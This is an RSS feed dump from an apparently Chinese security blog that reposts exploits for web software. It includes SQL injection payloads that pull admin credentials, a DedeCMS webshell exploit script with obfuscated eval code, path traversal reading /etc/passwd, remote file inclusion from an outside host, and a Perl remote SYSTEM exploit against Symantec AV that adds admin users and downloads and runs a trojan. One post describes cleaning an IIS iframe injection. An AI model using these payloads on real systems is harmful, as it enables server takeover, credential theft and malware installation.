http://www.0354hk.com/ zh-cn PBlog2 v2.4 http://www.0354hk.com/images/logos.gif http://www.0354hk.com/ GuLang's Blog http://www.0354hk.com/article.asp?id=390 chenliangsx@gmail.com(admin) Tue,09 Mar 2010 09:40:03 +0800 http://www.0354hk.com/default.asp?id=390 漏洞文件:MoveThread.asp
MoveThread.asp行2-24
#----代码阅读----#

if CookieUserName =empty then error("您还未<a href=""javascript:BBSXP_Modal.Open ('Login.asp',380,170);"">登录</a>") '保存cookie登陆即可
ThreadID=R


漏洞文件:MoveThread.asp
MoveThread.asp行2-24
<%
if CookieUserName =empty then error("您还未<a href=""javascript:BBSXP_Modal.Open (''Login.asp'',380,170);"">登录</a>") ''保存cookie登陆即可 ThreadID=Request("ThreadID") '' Sql Injection Vulnerability
If Not IsNumeric(ThreadID) then
ThreadIDArray=Split(ThreadID,",") ''判断数组,避免13行出错
if IsArray(ThreadIDArray) then
for i=0 to Ubound(ThreadIDArray)
if Execute ("Select ThreadID from ["&TablePrefix&"Threads] where ThreadID="& ThreadIDArray(i)&"").eof then error"<li>系统不存在该帖子的资料"
next
ThreadIDSql=int(ThreadIDArray(0))
else
error("参数错误。")
end if
Else
ThreadIDSql=int(ThreadID)
End If


ForumID=Execute("Select ForumID From ["&TablePrefix&"Threads] where ThreadID="&ThreadIDSql&"")(0)
%>
<!-- #include file="Utility/ForumPermissions.asp" -->

先执行了查询后判断了权限，导致普通用户即可进行sql注射。
构造Url：;
提交，返回出错信息
Microsoft JET Database Engine 错误 ''80040e14''
字符串的语法错误 在查询表达式 ''ThreadID=1'''' 中。
/BBSXP_Class.asp，行 5
漏洞辅助工具：SQL 版本比较好利用，access的nbsi貌似只能猜解出表和字段，字段值无法猜解，需要手工进行。
文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1157.html]]> http://www.0354hk.com/article.asp?id=389 chenliangsx@gmail.com(admin) Tue,09 Mar 2010 09:39:33 +0800 http://www.0354hk.com/default.asp?id=389 漏洞关联文件：member_guestbook_action.php
源码解析：

$title = cn_substr(html2text($title),60);
$msg = cn_substr(stripslashes($msg),2048);
if($cfg_ml->M_UserName!="" && $cfg_ml->M_ID!=$uidnum) $gid = $cfg_ml->M_UserName;
else  $gid = '''';

$inquery = "
   Insert INTO #@__member_guestbook(mid,gid,title,msg,uname,email,qq,tel,ip,dtime)
   VALUES (''$uidnum'',''$gid'',''$title'',''$msg'',''$uname'',''$email'',''$qq'',''$tel'',''".GetIP()."'',".mytime().");
";


漏洞等级：一般的注射
cn_substr在别处有别的错.这里无所谓了.

利用位置：
空间留言:

cccccc'',(select concat(userid,0x3a,pwd) from #@__admin limit 0,1),'''','''','''',''123'',123)#]]> http://www.0354hk.com/article.asp?id=388 chenliangsx@gmail.com(admin) Tue,09 Mar 2010 09:39:00 +0800 http://www.0354hk.com/default.asp?id=388 #DedeCms v5.5 0day#
<?php
print_r(''
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
'');
if ($argc < 3) {
print_r(''
+----------------------------------------+
Usage: php ''.$argv[0].'' host path
host:      target server (ip/hostname)
path:      path to dedecms
Example:
php ''.$argv[0].'' localhost /dedecms/
+----------------------------------------+    
'');
exit;
}
error_reporting(7);
ini_set(''max_execution_time'', 0);

$host = $argv[1];
$path = $argv[2];

$post_a = ''plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*'';
$post_b = ''needCode=aa/../../../data/mysql_error_trace'';
$shell = ''data/cache/t.php'';

get_send($post_a);
post_send(''plus/comments_frame.php'',$post_b);
$content = post_send($shell,''t=echo tojen;'');

if(substr($content,9,3)==''200''){
    echo "\nShell Address is:".$host.$path.$shell;
}else{
    echo "\nError.";
}
function get_send($url){
    global $host, $path;
    $message = "GET ".$path."$url  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $fp = fsockopen($host, 80);
    if(!$fp){
        echo "\nConnect to host Error";
    }
    fputs($fp, $message);
    
    $back = '''';

    while (!feof($fp))
        $back .= fread($fp, 1024);
    fclose($fp);
    return $back;
    
}
function post_send($url,$cmd){
    
    global $host, $path;
    $message = "POST ".$path."$url  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    $fp = fsockopen($host, 80);
    if(!$fp){
        echo "\nConnect to host Error";
    }
    fputs($fp, $message);
    
    $back = '''';

    while (!feof($fp))
        $back .= fread($fp, 1024);
    fclose($fp);
    return $back;
}
?>
相关利用过程明天给出，谣传通杀全部版本！]]> http://www.0354hk.com/article.asp?id=387 chenliangsx@gmail.com(admin) Tue,09 Mar 2010 09:38:05 +0800 http://www.0354hk.com/default.asp?id=387 http://www.dedecms.com/upimg/sof ... 55-GBK-Final.tar.gz

这个漏洞是上次那个代码执行漏洞的再次利用


/include/dedesql.class.php

01    //显示数据链接错误信息
02        function DisplayError($msg)
03        {
04            $errorTrackFile = dirname(__FILE__).'/../data/mysql_error_trace.inc';
05            if( file_exists(dirname(__FILE__).'/../data/mysql_error_trace.php') )
06            {
07                @unlink(dirname(__FILE__).'/../data/mysql_error_trace.php');
08            }
09            $emsg = '';
10            $emsg .= "<div><h3>DedeCMS Error Warning!</h3>\r\n";
11            $emsg .= "<div><a href='http://bbs.dedecms.com' target='_blank' style='color:red'>Technical Support: http://bbs.dedecms.com</a></div>";
12            $emsg .= "<div style='line-helght:160%;font-size:14px;color:green'>\r\n";
13            $emsg .= "<div style='color:blue'>Error page: <font color='red'>".$this->GetCurUrl()."</font></div>\r\n";
14            $emsg .= "<div>Error infos: {$msg}</div>\r\n";
15            $emsg .= "</div></div>\r\n";
16            
17            echo $emsg;
18            
19            $savemsg = 'Page: '.$this->GetCurUrl()."\r\nError: ".$msg;
20            //保存MySql错误日志
21            $fp = @fopen($errorTrackFile, 'a');
22            @fwrite($fp, '<'.'?php'."\r\n/*\r\n{$savemsg}\r\n*/\r\n?".">\r\n");
23            @fclose($fp);
24        }
数据库错误代码写入 /data/mysql_error_trace.inc，我们可以利用上次的方法先将代码，比如phpinfo();echo flyh4t;注入到该文件中

继续看代码

include/datalistcp.class.php

01    if(!defined('DEDEINC'))
02    {
03            exit('Request Error!');
04    }
05    require_once(DEDEINC.'/dedetemplate.class.php');
06    $codefile = (isset($needCode) ? $needCode : $cfg_soft_lang);
07    if(file_exists(DEDEINC.'/code/datalist.'.$codefile.'.inc'))
08    {
09            require_once(DEDEINC.'/code/datalist.'.$codefile.'.inc');
10    }
$needCode 没有过滤，造成了一个本地文件包含漏洞，而且包含的是一个inc文件，用来包含上面的那个inc实在是再好不过了

plus目录下多个文件可以触发这个漏洞。这里不需要担心注册变量的问题，文件一般会先include common.inc.php 文件
提交$needCode后dedecms会模拟全局变量自动帮我们注册

比如如下代码：

/plus/comments_frame.php

01    <?php
02    
03    /**
04     * 二级域名评论调用
05     *
06     * @author cha369
07     * @package dedecms
08     */
09    require_once(dirname(__FILE__)."/../include/common.inc.php");
10    require_once(DEDEINC."/datalistcp.class.php");
]]> http://www.0354hk.com/article.asp?id=386 chenliangsx@gmail.com(admin) Tue,09 Mar 2010 09:35:22 +0800 http://www.0354hk.com/default.asp?id=386 inurl:friendlink.asp 网站介绍：E_mail:
exp:
productview.asp?id=8%20union%20select%201,admin,3,4,5,6,7,password,9,10,11,12%20from%20admin
爆出管理用户名 密码
（poc:cmd5加密）
3.后台地址：admin/adminlogin.asp
4.后台有数据库备份]]> http://www.0354hk.com/article.asp?id=385 chenliangsx@gmail.com(admin) Sun,07 Mar 2010 12:35:52 +0800 http://www.0354hk.com/default.asp?id=385 http://www.ipmotor.com/cases/cases.html)， 其webmail部分使用perl cgi编写，近日笔者在渗透测试过程当中发现一处严重的安全漏洞，导致远程用户可以在邮件系统上以当前web权限身份下载任意文件，获取敏感配置文件（如 系统口令文件/数据库密码）从而进一步渗透主机或者系统。
影响范围：<=quarkmail server   version 1.2.1(本稿截止为最新版)
厂商网址：http://www.ipmotor.com/
漏洞解析：用户传入的 参数没有做有效的过滤，从而导致产生了目录遍历漏洞。

漏洞测试：
登录进入系统之后访问精心构造的邮件附件URL
http://mail.xxx.com/cgi-bin/down … P/E/B/xxx@xxxx.com/
inbox/1265055507.75326.439.www.xxx.com&filename=.. /../../../../../../../../../../../../etc/passwd即可以将passwd文件下载至本地打开，下载 mysql数据库文件将可以获取数据库密码。
漏洞解决：请等待官方补丁。 ]]> http://www.0354hk.com/article.asp?id=384 chenliangsx@gmail.com(admin) Sat,06 Mar 2010 21:17:02 +0800 http://www.0354hk.com/default.asp?id=384
一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
这种样式的代码 有的在头部　有的在尾部 部分杀毒软件打开会报毒
打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码
分析原因
首先怀疑ARP挂马，用防ＡＲＰ的工具又没有发现有arp欺骗
而且arp欺骗一般不会每次都被插入代码，而是时有时无
而且使用http://127.0.0.1 或者http://localhost 访问的时候也可以找到这段代码
arp欺骗的可能排除。
然后就想到可能是JS被篡改，或者是其它的包含文件，查找后没有发现被改的页面 连新建的HTML页面浏览的时候也会被插入这段代码，那就只能是通过ＩＩＳ挂上去的了。
备份iis数据然后重装iis，代码消失，将备份的iis恢复，问题又来了。
仔细寻找，问题应该出在IIS的配置文件上，打开配置文件，没有发现那段代码。
那很有可能是调用了某个文件，这个怎么查啊，忽然想起了大名鼎鼎的Filemon
本地载了一个上传到服务器上，打开Filemon，数据太多了，过滤掉一些没有用的
只留下iis的进程，数据还是很多，看来服务器上的站点还是挺多人在访问的。
关掉所有站点,建了一个测试站点anky 目录为D:\www\　在下面建了一个空白页面test.htm
访问一下这个页面代码被插进来了，再看一下Filemon　奇怪怎么读取C:\Inetpub\wwwroot\iisstart.htm
打开C:\Inetpub\wwwroot\iisstart.htm一看，里面就躺着
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
把代码删除了留空，访问test.htm 正常了，把C:\Inetpub\wwwroot\iisstart.htm删除了再访问
test.htm　出现　“读取数据页脚文件出错”问题就出这里了，看来是调用了
这个文件。
把C:\Inetpub\wwwroot\iisstart.htm清空就正常了，这样怎么行，解决问题当然要连根拔掉。
continue
有没有可能是扩展造成的，到扩展中检查了一遍全部都是正常的
当然 通过ISAPI 挂马的也是存在的
左想右想最后还是觉得配置文件有问题
打开配置文件，配置文件在%windir%\system32\inetsrv\MetaBase.xml
用记事本打开，查找iisstart.htm　找到一行，开始以为是默认站点，后来一想不对啊
默认站点都删除了，再仔细一看这句代码为
DefaultDocFooter="file:C:\Inetpub\wwwroot\iisstart.htm"
删除掉这一行，问题彻底解决了。
]]> http://www.0354hk.com/article.asp?id=383 chenliangsx@gmail.com(admin) Sat,06 Mar 2010 21:11:56 +0800 http://www.0354hk.com/default.asp?id=383 #Successfully exploiting this issue will allow an attacker to execute arbitrary commands with #SYSTEM-level privileges, completely compromising affected computers. Failed exploit attempts will #result in a denial-of-service condition.
# # # # # # # # # # # # # # # # # # # # # # # # #
### SYMANTEC AV w/ INTEL FILE TRANSFER SERVICE
### REMOTE SYSTEM LEVEL EXPLOIT
### USE AT YOUR OWN RISK!3EST.COM
# # # # # # # # # # # # # # # # # # # # # # # # #
use IO::Socket;
sub rce {
($target, $cmmd) = @_;
$sock = IO::Socket::INET->new(PeerAddr => $target,
                           PeerPort => '12174',
                           Proto => 'tcp') || goto lbl;
$magic = sprintf("%d", 0xc0d3b4b3);
$command = "cmd.exe /C $cmmd | exit $magic";
$cmd = "$command";
$req = "\x00\x00\x00\x00" . pack("v", length($cmd)+1) . $cmd . "\x00";
print $sock $req;
read($sock, $res, 0x14);
$resp = substr($res, 0x10, 4);
if ($resp eq pack("L", 0xc0d3b4b3)) {
print "SUCCESS!\n";
} else {
print "COMMAND FAILED\n";
}
return;
lbl:
print "PORT CLOSED\n";
exit;
}
sub usage {
print "usage: perl xpl.pl [-a   ] [-a2     [-d  ] [-t  ]\n";
print "-a IS ADDUSER WITH SID METHOD\n";
print "-a2 IS ADDUSER BY NAME\n";
print "-t IS TEST\n";  
print "-d IS DOWNLOAD AND EXEC, EXE FILE MUST NOT BE DETECTABLE BY SYMANTEC AV\n";
print "Example: perl xpl.pl -a www.symantec.com r00t p455\n";
exit;
}
print "\n*** Symantec AV Remote Exploit\n*** by Kingcope in 2009\n\n";
if ($#ARGV  c:\\getcreds.vbs";
$getcred[1] = "echo Const adTypeBinary = 1 >> c:\\getcreds.vbs";
$getcred[2] = "echo Const adSaveCreateOverWrite = 2 >> c:\\getcreds.vbs";
$getcred[3] = "echo Dim BinaryStream >> c:\\getcreds.vbs";
$getcred[4] = "echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> c:\\getcreds.vbs";
$getcred[5] = "echo BinaryStream.Type = adTypeBinary >> c:\\getcreds.vbs";
$getcred[6] = "echo BinaryStream.Open >> c:\\getcreds.vbs";
$getcred[7] = "echo BinaryStream.Write ByteArray >> c:\\getcreds.vbs";
$getcred[8] = "echo BinaryStream.SaveToFile FileName, adSaveCreateOverWrite >> c:\\getcreds.vbs";
$getcred[9] = "echo End Function >> c:\\getcreds.vbs";
$getcred[10] = "echo Sub HTTPDownload( myURL, myPath ) >> c:\\getcreds.vbs";
$getcred[11] = "echo Set objHTTP = CreateObject( \"WinHttp.WinHttpRequest.5.1\" ) >> c:\\getcreds.vbs";
$getcred[12] = "echo objHTTP.Open \"GET\", myURL, False >> c:\\getcreds.vbs";
$getcred[13] = "echo objHTTP.Send >> c:\\getcreds.vbs";
$getcred[14] = "echo SaveBinaryData myPath, objHTTP.ResponseBody >> c:\\getcreds.vbs";
$getcred[15] = "echo End Sub >> c:\\getcreds.vbs";
$getcred[16] = "echo HTTPDownload \"$trojanurl\", \"c:\\installer.exe\" >> c:\\getcreds.vbs";
$getcred[17] = "echo Set shell = CreateObject(\"WScript.Shell\") >> c:\\getcreds.vbs";
$getcred[18] = "echo Set objEnv = shell.Environment(\"Process\")   >> c:\\getcreds.vbs";
$getcred[19] = "echo Set objEnv2 = shell.Environment(\"User\")   >> c:\\getcreds.vbs";
$getcred[20] = "echo Set objEnv3 = shell.Environment(\"System\")   >> c:\\getcreds.vbs";
$getcred[21] = "echo sysRoot = objEnv(\"systemroot\") >> c:\\getcreds.vbs";
$getcred[22] = "echo userProfile = objEnv(\"userprofile\") >> c:\\getcreds.vbs";
$getcred[23] = "echo objEnv2(\"Path\") = sysRoot ^& \";\" ^& sysRoot ^&\"\\system32;\" ^& sysRoot ^& \"\\temp;\" ^& sysRoot ^& \"\\wbem\" >> c:\\getcreds.vbs";
$getcred[24] = "echo objEnv3(\"Path\") = sysRoot ^& \";\" ^& sysRoot ^&\"\\system32;\" ^& sysRoot ^& \"\\temp;\" ^& sysRoot ^& \"\\wbem\" >> c:\\getcreds.vbs";
$getcred[25] = "echo objEnv2(\"TEMP\") = sysRoot ^& \"\\temp\" >> c:\\getcreds.vbs";
$getcred[26] = "echo objEnv2(\"TMP\") =   sysRoot ^& \"\\temp\" >> c:\\getcreds.vbs";
$getcred[27] = "echo objEnv3(\"TEMP\") = sysRoot ^& \"\\temp\" >> c:\\getcreds.vbs";
$getcred[28] = "echo objEnv3(\"TMP\") =   sysRoot ^& \"\\temp\" >> c:\\getcreds.vbs";
$getcred[29] = "echo shell.CurrentDirectory = \"c:\\\" >> c:\\getcreds.vbs";
$getcred[30] = "echo shell.Run Chr(34) ^& \"c:\\installer.exe\" ^& Chr(34), 1, false >> c:\\getcreds.vbs";
$getcred[31] = "echo Set shell = Nothing >> c:\\getcreds.vbs";
$commandx = $getcred[0];
for ($k=1;$k c:\\getcred.vbs";
$getcreds[1] = "echo strSID = \"S-1-5-32-544\" >> c:\\getcred.vbs";
$getcreds[2] = "echo Set objWMIService = GetObject(\"winmgmts:\\\\\" ^& strComputer ^& \"\\root\\cimv2\") >> c:\\getcred.vbs";
$getcreds[3] = "echo Set objSID = objWMIService.Get(\"Win32_SID='\" ^& strSID ^& \"'\") >> c:\\getcred.vbs";
$getcreds[4] = "echo groupname=objSID.AccountName >> c:\\getcred.vbs";
$getcreds[5] = "echo Set objNetwork = WScript.CreateObject(\"WScript.Network\") >> c:\\getcred.vbs";
$getcreds[6] = "echo Set objGroup = GetObject(\"WinNT://\" ^& objNetwork.ComputerName ^& \"/\"^&groupname^&\",group\") >> c:\\getcred.vbs";
$getcreds[7] = "echo Admin_Name = WScript.Arguments(0) >> c:\\getcred.vbs";
$getcreds[8] = "echo Path = \"WinNT://\" ^& objNetwork.ComputerName ^& \"/\" ^& Admin_Name >> c:\\getcred.vbs";
$getcreds[9] = "echo If Not objGroup.IsMember(Path) Then   >> c:\\getcred.vbs";
$getcreds[10] = "echo objGroup.Add(Path) >> c:\\getcred.vbs";
$getcreds[11] = "echo End If >> c:\\getcred.vbs";
$getcreds[12] = "echo Set objGroup = Nothing >> c:\\getcred.vbs";
$getcreds[13] = "echo set objNetwork = Nothing   >> c:\\getcred.vbs";
$username = $ARGV[2];
$password = $ARGV[3];
$commandxx = $getcreds[0];
for ($k=1;$k
EXP：
下载
[url=http://www.51chi.net/qing/smtkExp.rar]http://www.51chi.net/qing/
smtkExp.rar
[/url]

]]> http://www.0354hk.com/article.asp?id=382 chenliangsx@gmail.com(admin) Sat,06 Mar 2010 21:09:43 +0800 http://www.0354hk.com/default.asp?id=382
漏洞文件:php/viewart.php
<?
require_once("config.php");
require_once("../manage/inc_makeart.php");
if(isset($artID)) $ID=$artID;
if(!isset($ID))
{
echo "指定的文章不存在！";
exit;
}
//检测会员权限


$conn = connectMySql();
$rs = mysql_query("select dede_art.title,dede_art.msg,dede_art.rank,dede_membertype.membername from dede_art left join dede_membertype on dede_art.rank=dede_membertype.rank where dede_art.ID=$ID",$conn);
$row = mysql_fetch_array($rs);
$sta = CheckUser($row["rank"]);
//如果用户没权限
if($sta==0)
{
$body = "";
$body .= "你要查看的文章是:".$row["title"];
$body .= "<br>文章简介：".$row["msg"]."<br><br>这篇文章是 <font color='red'>".$row["membername"];
$body .= "</font> 文章，你的权限不足，无法查看！<br>";
$body .= "如果你已经升级为这个级别的会员，";
$body .= "请点击此重新<a href='/member/login.php'><u>登录</u></a>";
$body .= "<br><br><a href='javascript:history.go(-1);'><u>点击此返回上一页</u></a>";
echo $body;
exit();
}
//////////////正常情况返回的内容///////////
if(!isset($page)) $page=0;
$mr = new makeArt();
echo $mr->makeArtView($ID,$page);
?>

第一种修复:$conn = str_replace("select", "/_", $conn);

第二种修复:if (!get_magic_quotes_gpc()) {

$conn = addslashes($conn);

}]]> http://www.0354hk.com/article.asp?id=381 chenliangsx@gmail.com(admin) Sat,06 Mar 2010 21:09:09 +0800 http://www.0354hk.com/default.asp?id=381 漏洞描述:
verifycode.php

<?php  
/**  
*  
* 登陆验证码生成文件  
*
* @package ShopEx网上商店系统  
* @version 4.6  
* @author ShopEx.cn <>  
* @url  
* @since PHP 4.3  
* @copyright ShopEx.cn  
*  
**/ if (!defined("ISSHOP"))
  {  Header("Location:../index.php");
  exit;
  }
  /* 调用 session 文件 */ include_once($INC_SYSHOMEDIR."include/session.inc.php");    mt_srand((double)microtime() * 1000000);
  /* 生成验证码 */
$strValidate = mt_rand(1000, 9999);
  session_unregister("RANDOM_CODE");
  session_register("RANDOM_CODE");
  $_SESSION["RANDOM_CODE"] = $strValidate."";
  $verifyImg = newclass("verifyCode", $strValidate);
    /* 输出验证码图片 */
$verifyImg->Output();
  ?>
测试方法:
http://www.sitedir.com.cn/shop/verifycode.php?INC_SYSHOMEDIR=http://www.coffly.com/xx.txt?
防治建议:
暂无
请参考官方补丁
ShopEx.cn

文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1153.html]]>